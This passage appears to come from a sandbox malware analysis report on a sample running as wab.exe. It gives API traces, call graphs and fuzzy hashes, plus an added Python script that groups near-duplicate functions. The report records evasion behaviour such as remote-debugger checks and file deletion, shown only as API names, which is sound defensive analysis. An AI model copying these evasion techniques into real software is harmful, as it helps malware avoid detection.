                                                                              • Instruction ID: 17056c98749ba551a824c98615605a4a7027ec745b03bca4ecdd6c0595fe6376
                                                                              • Opcode Fuzzy Hash: 77420264bba4fa9bcf584cb563ce2c0cf8eb7026dd7b4a113e29fa059a06b244
                                                                              • Instruction Fuzzy Hash: 852128B1D002598FDB10CF9AD884BEEFBF4EF49320F24846AE459A7250D778A944CF65
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%
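Each `Memory Dump Source` record above carries a per-function `Opcode ID` and two fuzzy hashes. The two CheckRemoteDebuggerPresent functions at 25770b8 and 25770b0 have different Opcode IDs, yet their Instruction Fuzzy Hashes differ in only a handful of hex digits, which is what you would expect from one anti-debug routine present twice in the dump. The script below is an added example, not the report's or Joe Sandbox's own code: it parses such records into dicts, groups them by referenced API, and flags near-duplicates by Hamming distance over the hash string. Comparing the hash position by position is our assumption about its layout (Joe Sandbox does not document it), so a hit is a triage hint rather than proof of identical code. The input is the two records from this page, abridged.

```python
"""Parse Joe Sandbox 'Memory Dump Source' records and flag functions whose
Instruction Fuzzy Hashes are near-identical."""
import re
from itertools import combinations
from typing import Any, Dict, List, Tuple

# Two records copied (abridged) from this report: CheckRemoteDebuggerPresent
# at 25770b8 and 25770b0 in the wab.exe dump. Page data, not constructed.
REPORT = """\
APIs
• CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 0257712F
Memory Dump Source
• Source File: 00000009.00000002.2939947803.0000000002570000.00000040.00000800.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
• Snapshot File: hcaresult_9_2_2570000_wab.jbxd
• API ID: CheckDebuggerPresentRemote
• Opcode ID: df8acd8a8990f24d0c7fad7f163fc9689cc3a2bb5f53886076fb9bcb934779f4
• Instruction Fuzzy Hash: 032128B1D002598FDB10CF9AD844BEEFBF4EF49320F14845AE459A7250D778A944CF65
Uniqueness Score: -1.00%
APIs
• CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 0257712F
Memory Dump Source
• Source File: 00000009.00000002.2939947803.0000000002570000.00000040.00000800.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
• Snapshot File: hcaresult_9_2_2570000_wab.jbxd
• API ID: CheckDebuggerPresentRemote
• Opcode ID: 77420264bba4fa9bcf584cb563ce2c0cf8eb7026dd7b4a113e29fa059a06b244
• Instruction Fuzzy Hash: 852128B1D002598FDB10CF9AD884BEEFBF4EF49320F24846AE459A7250D778A944CF65
Uniqueness Score: -1.00%
"""

_FIELD = re.compile(r"^• ([A-Za-z ]+): (.*)$")
# Matches "DeleteFileW.KERNEL32(00000000), ref: 025784B0" and "memset.MSVCRT ref: 00621CC6".
_API = re.compile(r"^• (\w+)\.(\w+)(?:\((.*)\))?,? ref: ([0-9A-Fa-f]+)$")


def parse_records(text: str) -> List[Dict[str, Any]]:
    """One dict per record; a record ends at its 'Uniqueness Score' line."""
    records: List[Dict[str, Any]] = []
    cur: Dict[str, Any] = {"apis": []}
    for raw in text.splitlines():
        line = raw.strip()
        if (m := _API.match(line)):
            cur["apis"].append({"name": m.group(1), "module": m.group(2), "ref": m.group(4)})
        elif (m := _FIELD.match(line)):
            cur[m.group(1)] = m.group(2)
        elif line.startswith("Uniqueness Score:"):
            cur["Uniqueness Score"] = line.split(":", 1)[1].strip()
            records.append(cur)
            cur = {"apis": []}
    return records


def hamming(h1: str, h2: str) -> int:
    """Number of differing hex digits between two equal-length hash strings."""
    if len(h1) != len(h2):
        raise ValueError("fuzzy hashes of different lengths are not comparable")
    return sum(a != b for a, b in zip(h1.upper(), h2.upper()))


def near_duplicates(records: List[Dict[str, Any]], max_distance: int = 8) -> List[Tuple[str, str, int]]:
    """Pairs of records whose Instruction Fuzzy Hashes differ in at most
    max_distance digits. Positional comparison is our assumption about the
    hash layout, not a documented property; treat hits as triage hints."""
    hits = []
    for a, b in combinations(records, 2):
        ha, hb = a.get("Instruction Fuzzy Hash"), b.get("Instruction Fuzzy Hash")
        if ha and hb and len(ha) == len(hb):
            d = hamming(ha, hb)
            if d <= max_distance:
                hits.append((a["Opcode ID"][:12], b["Opcode ID"][:12], d))
    return hits


def by_api(records: List[Dict[str, Any]]) -> Dict[str, List[str]]:
    """Map each referenced API to the (shortened) Opcode IDs of functions calling it."""
    out: Dict[str, List[str]] = {}
    for r in records:
        for api in r["apis"]:
            out.setdefault(api["name"], []).append(r["Opcode ID"][:12])
    return out


if __name__ == "__main__":
    recs = parse_records(REPORT)
    print(f"{len(recs)} records; API -> functions: {by_api(recs)}")
    for a, b, d in near_duplicates(recs):
        print(f"near-duplicate: {a}.. vs {b}.. (hamming distance {d})")
```

Run over a whole report, `by_api` gives the list of functions behind each signature-relevant call (CheckRemoteDebuggerPresent, GlobalMemoryStatusEx, DeleteFileW here), and `near_duplicates` collapses the repeated copies so each routine is reviewed once.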

                                                                              Control-flow Graph

                                                                              control_flow_graph 79 2578440-257848a 81 2578492-25784bd DeleteFileW 79->81 82 257848c-257848f 79->82 83 25784c6-25784ee 81->83 84 25784bf-25784c5 81->84 82->81 84->83
                                                                              APIs
                                                                              • DeleteFileW.KERNEL32(00000000), ref: 025784B0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2939947803.0000000002570000.00000040.00000800.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_2570000_wab.jbxd
                                                                              Similarity
                                                                              • API ID: DeleteFile
                                                                              • String ID: |l
                                                                              • API String ID: 4033686569-2063047074
                                                                              • Opcode ID: 716bc4444e1adf947e723046c4709e5ee6c9a511fceadd53ae1cab0b0ee69fbf
                                                                              • Instruction ID: 7980d5dda391f135f6eaadbb5dcb5f1e0b33b77540c3a5eb9b5f0ed39f1ae943
                                                                              • Opcode Fuzzy Hash: 716bc4444e1adf947e723046c4709e5ee6c9a511fceadd53ae1cab0b0ee69fbf
                                                                              • Instruction Fuzzy Hash: 861136B1C006599BCB10CF9AD549B9EFBF4FF48324F15812AD818A7640D778A940CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              control_flow_graph 87 257f558-257f5cc GlobalMemoryStatusEx 89 257f5d5-257f5fd 87->89 90 257f5ce-257f5d4 87->90 90->89
                                                                              APIs
                                                                              • GlobalMemoryStatusEx.KERNEL32 ref: 0257F5BF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2939947803.0000000002570000.00000040.00000800.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_2570000_wab.jbxd
                                                                              Similarity
                                                                              • API ID: GlobalMemoryStatus
                                                                              • String ID: |l
                                                                              • API String ID: 1890195054-2063047074
                                                                              • Opcode ID: 62d0c4e3be17fc27b1f1f38717887408f03a2358e8977d1c890a1bafd30fa26e
                                                                              • Instruction ID: 1ac760c3d9352e9d427319060b87fc75393a1bc49dd20509373b9d0c61a2f0b0
                                                                              • Opcode Fuzzy Hash: 62d0c4e3be17fc27b1f1f38717887408f03a2358e8977d1c890a1bafd30fa26e
                                                                              • Instruction Fuzzy Hash: 2E111FB1C0066A9BCB10CFAAC544BDEFBF4BF48320F14816AD818A7640D778A940CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2939750670.000000000254D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0254D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_254d000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bc68b2ff3c830eb6cce43ad6c90734af437a152f2d5180876abf4d3cc6f05d19
                                                                              • Instruction ID: 728475b200aa2a31051077a759e41c61f4ddb01d1ed986e44e5a5786bbed8b6e
                                                                              • Opcode Fuzzy Hash: bc68b2ff3c830eb6cce43ad6c90734af437a152f2d5180876abf4d3cc6f05d19
                                                                              • Instruction Fuzzy Hash: 8D2100B1605200DFDB10DF14D980B26FFB5FB88318F24C96DE90D4B246DB3AE806CA66
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2939750670.000000000254D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0254D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_254d000_wab.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d2c524f9a6492cb18d457a139d617f430aafae7ae12c6c3bba7f73639ee57585
                                                                              • Instruction ID: 4407e08449b3100556debb9a447165ec5e739fff51426ea1d695f29cf92d8273
                                                                              • Opcode Fuzzy Hash: d2c524f9a6492cb18d457a139d617f430aafae7ae12c6c3bba7f73639ee57585
                                                                              • Instruction Fuzzy Hash: B611BB75504280CFDB12CF14D5C0B25FFB1FB84318F28C6AAD8494B656C33AE44ACB62
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Execution Graph

                                                                              Execution Coverage:27.8%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:28.1%
                                                                              Total number of Nodes:217
                                                                              Total number of Limit Nodes:4
execution_graph 875 6237c2 876 6237d3 875->876 879 622f51 ResolveDelayLoadedAPI 876->879 878 6237e0 879->878 896 6231d3 897 6231e7 _exit 896->897 898 6231ee 896->898 897->898 899 623202 898->899 900 6231f7 _cexit 898->900 900->899 647 623030 664 623675 647->664 649 623035 650 623046 GetStartupInfoW 649->650 651 623063 650->651 652 623078 651->652 653 62307f Sleep 651->653 654 623097 _amsg_exit 652->654 656 6230a1 652->656 653->651 654->656 655 6230e3 _initterm 660 6230fe __IsNonwritableInCurrentImage 655->660 656->655 657 6230c4 656->657 656->660 658 6231a6 _ismbblead 658->660 659 6231ee 659->657 662 6231f7 _cexit 659->662 660->658 660->659 663 62318e exit 660->663 669 621c5c 660->669 662->657 663->660 665 62369a 664->665 666 62369e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 664->666 665->666 668 623702 665->668 667 6236ed 666->667 667->668 668->649 733 6237f0 669->733 673 621d01 HeapSetInformation 674 621d20 673->674 706 621d18 673->706 737 6229ab CommandLineToArgvW 674->737 679 622560 683 62256b FreeLibrary 679->683 684 622578 679->684 680 62201a FreeLibrary 680->679 681 621da9 RegisterClassW CreateWindowExW 682 621e0e 681->682 681->706 751 621b83 memset 682->751 689 621e22 GetLastError 689->706 690 621e2f 757 6225d3 memset memset CommandLineToArgvW 690->757 691 621ae4 2 API calls 693 62259a 691->693 791 6232b0 693->791 696 6225a9 696->660 698 621eee 699 621ef2 EventUnregister 698->699 701 621f1f memset LoadStringW MessageBoxW 699->701 702 621f6d 699->702 701->706 703 621f79 GetProcAddress 702->703 708 62202e 702->708 703->706 705 622036 GetProcAddress 705->706 710 62204e 705->710 706->679 706->680 708->705 709 62208a 708->709 709->706 711 62211c GetProcAddress 709->711 710->706 711->706 712 622136 711->712 713 62218c memset 712->713 715 622225 712->715 717 6221a9 LoadStringW 713->717 716 622384 715->716 797 621b21 715->797 718 62242a 716->718 719 62238d GetProcAddress 716->719 717->715 721 622433 GetProcAddress 718->721 722 6224d0 718->722 719->706 728 6223a5 719->728 721->706 729 62244b 721->729 723 6224d8 GetProcAddress 722->723 725 6224f0 722->725 723->706 723->725 724 622525 GetProcAddress 724->706 726 62253d 724->726 725->706 725->724 726->679 728->706 730 6223e2 memset LoadStringW 728->730 729->706 731 622488 memset LoadStringW 729->731 730->718 731->722 732 62233c memset LoadStringW 732->716 734 621c6b memset GetCommandLineW 733->734 735 621ab0 734->735 736 621acb 735->736 736->673 736->736 738 621d27 737->738 739 6229cc 737->739 743 621bf4 738->743 740 6229db LocalFree 739->740 740->738 741 6229ec 740->741 742 622a08 RegisterApplicationRestart 741->742 742->738 801 6228a4 memset 743->801 746 621c28 PathAppendW 747 621c4d 746->747 748 621c3e LoadLibraryW 746->748 749 6232b0 4 API calls 747->749 748->747 750 621c5a LoadStringW LoadIconW LoadCursorW 749->750 750->681 752 6228a4 10 API calls 751->752 754 621bbb LoadLibraryW 752->754 755 6232b0 4 API calls 754->755 756 621bf2 755->756 756->689 756->690 758 622888 757->758 759 622661 757->759 761 6232b0 4 API calls 758->761 760 62287d LocalFree 759->760 762 622683 StrCmpNIW 759->762 768 622676 759->768 760->758 763 621e43 761->763 764 6226f0 762->764 769 6226a0 762->769 763->706 782 62193a EventRegister 763->782 766 622709 PathFindExtensionW 764->766 767 622741 764->767 765 622761 StrCmpIW 765->767 773 622785 765->773 770 62271e StrCmpIW 766->770 767->765 767->768 768->760 769->768 813 621b57 769->813 770->767 771 622730 770->771 771->768 771->770 773->768 774 6227c0 773->774 775 6227d3 GetFileAttributesW 774->775 776 6227e5 775->776 780 622833 775->780 777 622811 776->777 778 6227ee PathRemoveFileSpecW 776->778 777->768 778->777 779 6227ff GetFileAttributesW 778->779 779->777 779->780 780->777 817 622b60 780->817 783 621998 EventSetInformation 782->783 784 62198b 782->784 783->784 785 6232b0 4 API calls 784->785 786 6219c5 785->786 786->698 786->699 796 6219c7 EventWriteTransfer 786->796 788 621af2 787->788 789 621b16 788->789 790 621b06 GetProcessHeap HeapFree 788->790 789->691 790->789 792 6232bb 791->792 793 6232b8 791->793 831 6232c0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 792->831 793->696 795 6233f6 795->696 796->698 798 621b4d 797->798 799 621b2e 797->799 798->706 798->732 799->799 832 622c36 799->832 802 6228ee RegOpenKeyExW 801->802 803 62299d 801->803 805 622914 RegQueryValueExW 802->805 806 622989 802->806 804 6232b0 4 API calls 803->804 808 621c17 PathRemoveFileSpecW 804->808 805->806 809 622949 805->809 806->803 807 622991 RegCloseKey 806->807 807->803 808->746 808->747 810 622958 ExpandEnvironmentStringsW 809->810 811 62296d GetFileAttributesW 809->811 810->806 811->806 812 622979 811->812 812->806 814 621b63 813->814 814->814 815 622b60 6 API calls 814->815 816 621b7b 815->816 816->768 818 622bc7 817->818 819 622b74 817->819 818->777 819->818 823 622a7e 819->823 822 622baa memcpy 822->818 824 622a95 823->824 825 622a8e 823->825 824->825 826 622ac9 GetProcessHeap HeapAlloc 824->826 825->818 825->822 826->825 827 622adf 826->827 828 622ae5 memcpy 827->828 829 622aff 827->829 828->829 829->825 829->829 830 622b33 GetProcessHeap HeapFree 829->830 830->825 831->795 833 622c61 832->833 834 622ce8 832->834 837 622a7e 5 API calls 833->837 835 6232b0 4 API calls 834->835 836 622cf7 835->836 836->798 838 622c86 837->838 839 622cd4 838->839 844 622cfb 838->844 841 621ae4 2 API calls 839->841 841->834 845 622cae 844->845 846 622d0a 844->846 845->839 852 622bd5 845->852 846->845 858 622ef8 846->858 848 622d44 memset 848->845 851 622d4b memset 851->845 853 622c28 852->853 854 622be5 852->854 853->839 854->853 855 622a7e 5 API calls 854->855 856 622c0b 855->856 856->853 857 622c11 memcpy 856->857 857->853 859 622f07 858->859 861 622d2b 859->861 862 622e3f 859->862 861->848 861->851 863 622e83 862->863 864 622e8f 863->864 865 622e9f LocalAlloc 863->865 864->861 865->864 866 622eaf 865->866 867 622ee8 LocalFree 866->867 870 622deb 866->870 867->864 869 622eda 869->867 871 622e1c 870->871 872 622df8 870->872 871->869 872->871 873 622e06 IsDBCSLeadByte 872->873 873->871 873->872 880 623400 881 62343d 880->881 883 623412 880->883 882 623437 ?terminate@ 882->881 883->881 883->882 884 622f80 885 622f85 884->885 893 6234d8 GetModuleHandleW 885->893 887 622f91 __set_app_type __p__fmode __p__commode 888 622fc9 887->888 889 622fd2 __setusermatherr 888->889 890 622fde 888->890 889->890 895 62370d _controlfp 890->895 892 622fe3 894 6234e9 893->894 894->887 895->892 901 623450 SetUnhandledExceptionFilter 902 6225b0 903 6225c5 PostQuitMessage 902->903 904 6225be DefWindowProcW 902->904 904->903 905 623790 _except_handler4_common 874 623001 __getmainargs 906 6231bf _XcptFilter

                                                                              Callgraph

                                                                              callgraph 0 Function_00622B60 12 Function_00622A7E 0->12 1 Function_00621A60 2 Function_00621AE4 3 Function_00623464 32 Function_00623728 3->32 4 Function_00622DEB 5 Function_0062376D 6 Function_006237F0 7 Function_00621BF4 30 Function_006228A4 7->30 35 Function_006232B0 7->35 8 Function_00623675 9 Function_00622CFB 10 Function_00622EF8 9->10 43 Function_00622E3F 10->43 11 Function_006213F8 13 Function_00622D7F 14 Function_006237C2 22 Function_00622F51 14->22 15 Function_006232C0 16 Function_00623640 17 Function_006219C7 18 Function_0062324A 19 Function_006225D3 19->0 19->1 23 Function_00621B57 19->23 19->35 20 Function_006231D3 21 Function_00623450 23->0 24 Function_00622BD5 24->12 25 Function_006234D8 25->3 26 Function_00621C5C 26->2 26->6 26->7 26->17 26->19 29 Function_00621B21 26->29 31 Function_006229AB 26->31 34 Function_00621AB0 26->34 26->35 42 Function_0062193A 26->42 45 Function_00621B83 26->45 27 Function_00623520 28 Function_00622A21 40 Function_00622C36 29->40 30->1 30->35 31->28 33 Function_00623030 33->8 33->26 33->32 46 Function_00623580 33->46 54 Function_00623219 33->54 35->15 36 Function_00623530 37 Function_006218B0 38 Function_006225B0 39 Function_006234B1 40->2 40->9 40->12 40->24 40->34 40->35 41 Function_006234B5 42->35 43->4 43->13 44 Function_006231BF 45->30 45->35 46->16 46->36 47 Function_00623400 48 Function_00621B80 49 Function_00622F80 49->18 49->25 49->27 52 Function_0062370D 49->52 50 Function_00623001 51 Function_0062360B 53 Function_00623790 55 Function_0062361E

                                                                              Control-flow Graph

control_flow_graph 0 621c5c-621d16 call 6237f0 memset GetCommandLineW call 621ab0 HeapSetInformation 5 621d20-621e08 call 6229ab call 621bf4 LoadStringW LoadIconW LoadCursorW RegisterClassW CreateWindowExW 0->5 6 621d18-621d1b 0->6 7 621faf 5->7 23 621e0e-621e20 call 621b83 5->23 6->7 10 621fb1-621fb9 7->10 12 621fbb-621fd5 10->12 13 621fde-621fe6 10->13 12->13 30 621fd7-621fdc 12->30 14 621fe8-622004 13->14 15 62200d-622014 13->15 14->15 31 622006-62200b 14->31 17 622560 15->17 18 62201a-622029 FreeLibrary 15->18 22 622562-622569 17->22 18->22 24 62256b-622572 FreeLibrary 22->24 25 622578-6225aa call 621ae4 * 2 call 6232b0 22->25 34 621e22 GetLastError 23->34 35 621e2f-621e45 call 6225d3 23->35 24->25 30->13 31->15 37 621e28-621e2a 34->37 35->7 42 621e4b-621e62 call 62193a 35->42 37->7 46 621ef0 42->46 47 621e68-621e76 42->47 48 621ef2-621f1d EventUnregister 46->48 47->48 49 621e78-621e88 47->49 51 621f1f-621f62 memset LoadStringW MessageBoxW 48->51 52 621f6d-621f73 48->52 49->48 50 621e8a-621e8c 49->50 50->48 53 621e8e-621eee call 6219c7 50->53 54 621f68-621f6b 51->54 55 621f79-621f8b GetProcAddress 52->55 56 62202e-622034 52->56 53->48 54->10 60 621fac-621fae 55->60 61 621f8d-621f95 55->61 58 622036 56->58 59 62206a-622070 56->59 65 622038-622048 GetProcAddress 58->65 62 622072-622074 59->62 63 622076-62207c 59->63 60->7 72 621f99-621f9b 61->72 67 622082-622084 63->67 68 62207e-622080 63->68 65->60 69 62204e-62205c 65->69 70 622086-622088 67->70 71 62208a-622098 67->71 68->65 88 622065 69->88 89 62205e-622063 69->89 70->65 73 6220b3-6220b9 71->73 74 62209a-6220a1 71->74 76 621fa4-621fa6 72->76 77 621f9d-621fa2 72->77 80 6220d4-6220da 73->80 81 6220bb-6220c2 73->81 78 6220a3-6220a9 74->78 79 6220ab-6220b1 74->79 76->37 76->60 77->76 84 62210f-622116 78->84 79->84 82 6220f5-6220fd 80->82 83 6220dc-6220e3 80->83 85 6220c4-6220ca 81->85 86 6220cc-6220d2 81->86 82->84 92 6220ff-622109 82->92 90 6220e5-6220eb 83->90 91 6220ed-6220f3 83->91 84->54 93 62211c-622130 GetProcAddress 84->93 85->84 86->84 88->60 89->88 90->84 91->84 92->84 93->54 94 622136-622179 93->94 97 622182-622186 94->97 98 62217b-622180 94->98 99 622225-622228 97->99 100 62218c-6221a7 memset 97->100 98->97 103 622251-622254 99->103 104 62222a-622247 99->104 101 6221a9-6221af 100->101 102 6221ec 100->102 105 6221b1-6221b7 101->105 106 6221e5-6221ea 101->106 109 6221f1-62221a LoadStringW 102->109 107 622281-622284 103->107 108 622256-62227f 103->108 125 62224a 104->125 110 6221b9-6221bf 105->110 111 6221de-6221e3 105->111 106->109 112 622286-622291 107->112 113 6222c7-6222ca 107->113 108->125 109->99 117 6221c1-6221d5 110->117 118 6221d7-6221dc 110->118 111->109 120 622293 112->120 121 622299-6222c5 112->121 115 6222d0-6222e4 call 621b21 113->115 116 622384-622387 113->116 115->54 132 6222ea-6222f5 115->132 122 62242a-62242d 116->122 123 62238d-62239f GetProcAddress 116->123 117->109 118->109 120->121 121->125 129 622433-622445 GetProcAddress 122->129 130 6224d0-6224d6 122->130 123->60 126 6223a5-6223c6 123->126 125->103 149 6223c8-6223cd 126->149 150 6223cf-6223d1 126->150 129->60 135 62244b-62246c 129->135 133 6224d8-6224ea GetProcAddress 130->133 134 622519-62251f 130->134 138 6222f7 132->138 139 6222fd-622320 132->139 133->60 140 6224f0-622514 133->140 134->54 136 622525-622537 GetProcAddress 134->136 151 622475-622477 135->151 152 62246e-622473 135->152 136->60 142 62253d-62255b 136->142 138->139 159 622322-622327 139->159 160 622329-62232b 139->160 140->134 142->17 149->150 150->60 153 6223d7-6223dc 150->153 151->60 156 62247d-622482 151->156 152->151 153->60 158 6223e2-62241f memset LoadStringW 153->158 156->60 161 622488-6224c5 memset LoadStringW 156->161 158->122 159->160 160->60 162 622331-622336 160->162 161->130 162->60 163 62233c-622379 memset LoadStringW 162->163 163->116
                                                                              APIs
                                                                              • memset.MSVCRT ref: 00621CC6
                                                                              • GetCommandLineW.KERNEL32 ref: 00621CCE
                                                                              • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?), ref: 00621D0E
                                                                              • LoadStringW.USER32(00000000,000007D1,?,00000104), ref: 00621D49
                                                                              • LoadIconW.USER32 ref: 00621D84
                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00621D96
                                                                              • GetStockObject.GDI32(00000000), ref: 00621DA3
                                                                              • RegisterClassW.USER32(00000003), ref: 00621DCD
                                                                              • CreateWindowExW.USER32(00000000,Contacts Viewer,?,00CF0000,00000000,00000000,0000012C,000000C8,00000000,00000000,00000000), ref: 00621DF8
                                                                              • GetLastError.KERNEL32 ref: 00621E22
                                                                              • FreeLibrary.KERNELBASE(?), ref: 0062201B
                                                                              • FreeLibrary.KERNELBASE(?), ref: 0062256C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.2095555637.0000000000621000.00000020.00000001.01000000.00000008.sdmp, Offset: 00620000, based on PE: true
                                                                              • Associated: 0000000A.00000002.2095534672.0000000000620000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000625000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000627000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.000000000063D000.00000002.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_620000_newfile.jbxd
                                                                              Similarity
                                                                              • API ID: Load$FreeLibrary$ClassCommandCreateCursorErrorHeapIconInformationLastLineObjectRegisterStockStringWindowmemset
                                                                              • String ID: $API Entered$Contacts Viewer$P^)u$WABOpen
                                                                              • API String ID: 328653217-431442686
                                                                              • Opcode ID: dea4fbd0e2a46c532a5c9a730ab8ca5fa10c009641d7b985e08ae16e0ba343e5
                                                                              • Instruction ID: 4d0a9acf3f3b590fde96331178cf7792fa07f2a485ef0b5f93936f7586498f29
                                                                              • Opcode Fuzzy Hash: dea4fbd0e2a46c532a5c9a730ab8ca5fa10c009641d7b985e08ae16e0ba343e5
                                                                              • Instruction Fuzzy Hash: 9432B771900A39ABDB348F15EC95BE977BBFF54300F0440A9E90AA72A0DB749E81CF50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              • Graph: entry block 623030 (rendered control-flow graph not reproduced; API calls are listed under APIs below)
                                                                              APIs
                                                                                • Part of subcall function 00623675: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 006236A2
                                                                                • Part of subcall function 00623675: GetCurrentProcessId.KERNEL32 ref: 006236B1
                                                                                • Part of subcall function 00623675: GetCurrentThreadId.KERNEL32 ref: 006236BA
                                                                                • Part of subcall function 00623675: GetTickCount.KERNEL32 ref: 006236C3
                                                                                • Part of subcall function 00623675: QueryPerformanceCounter.KERNEL32(?), ref: 006236D8
                                                                              • GetStartupInfoW.KERNEL32(?,00623838,00000058), ref: 0062304F
                                                                              • Sleep.KERNEL32(000003E8), ref: 00623084
                                                                              • _amsg_exit.MSVCRT ref: 00623099
                                                                              • _initterm.MSVCRT ref: 006230ED
                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00623119
                                                                              • exit.KERNELBASE ref: 0062318F
                                                                              • _ismbblead.MSVCRT ref: 006231AA
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.2095555637.0000000000621000.00000020.00000001.01000000.00000008.sdmp, Offset: 00620000, based on PE: true
                                                                              • Associated: 0000000A.00000002.2095534672.0000000000620000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000625000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000627000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.000000000063D000.00000002.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_620000_newfile.jbxd
                                                                              Similarity
                                                                              • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                              • String ID:
                                                                              • API String ID: 836923961-0
                                                                              • Opcode ID: 7e574c8318d1517912fba733d28b3a9860c5aec94ee01549ad59feca1a4d554f
                                                                              • Instruction ID: f9a43facb1a993d489be64131d2ec28ec8b009b44c1b02fed0884c70319e5999
                                                                              • Opcode Fuzzy Hash: 7e574c8318d1517912fba733d28b3a9860c5aec94ee01549ad59feca1a4d554f
                                                                              • Instruction Fuzzy Hash: 2441C531A04F359BDB359F55F8097AA77E7EB14760F20001AE902A7390CF788A52CF94
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              • Graph: entry block 6228a4 (rendered control-flow graph not reproduced; API calls are listed under APIs below)
                                                                              APIs
                                                                              • memset.MSVCRT ref: 006228DE
                                                                              • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\WAB\DLLPath,00000000,00020019,?,?,00000000,00000000), ref: 0062290A
                                                                              • RegQueryValueExW.KERNELBASE(?,006211FC,00000000,?,?,?,?,00000000,00000000), ref: 0062293F
                                                                              • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,00000000,00000000), ref: 0062295F
                                                                              • GetFileAttributesW.KERNEL32(?,?,00000000,00000000), ref: 0062296E
                                                                              • RegCloseKey.KERNELBASE(?,?,00000000,00000000), ref: 00622997
                                                                              Strings
                                                                              • Software\Microsoft\WAB\DLLPath, xrefs: 00622900
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.2095555637.0000000000621000.00000020.00000001.01000000.00000008.sdmp, Offset: 00620000, based on PE: true
                                                                              • Associated: 0000000A.00000002.2095534672.0000000000620000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000625000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000627000.00000002.00000001.01000000.00000008.sdmp
                                                                              • Associated: 0000000A.00000002.2095574084.000000000063D000.00000002.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_620000_newfile.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesCloseEnvironmentExpandFileOpenQueryStringsValuememset
                                                                              • String ID: Software\Microsoft\WAB\DLLPath
                                                                              • API String ID: 2763597636-3156921957
                                                                              • Opcode ID: 9e19a35abcc7ed9c6d8e44d5cfa7d1296d8d76e4e5cde52f29aa2f4b535b075e
                                                                              • Instruction ID: 08a6344e3ee614243f7ffb4a57ad4d4bad47a1b84dfb9967e310f2e9416c8cdd
                                                                              • Opcode Fuzzy Hash: 9e19a35abcc7ed9c6d8e44d5cfa7d1296d8d76e4e5cde52f29aa2f4b535b075e
                                                                              • Instruction Fuzzy Hash: 8B219571D41A2DAEDB309F15DC8CEDAB7BEAF54710F00029AB419E2250D7704BC5CEA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              • Graph: entry block 621bf4 (rendered control-flow graph not reproduced; API calls are listed under APIs below)
                                                                              APIs
                                                                                • Part of subcall function 006228A4: memset.MSVCRT ref: 006228DE
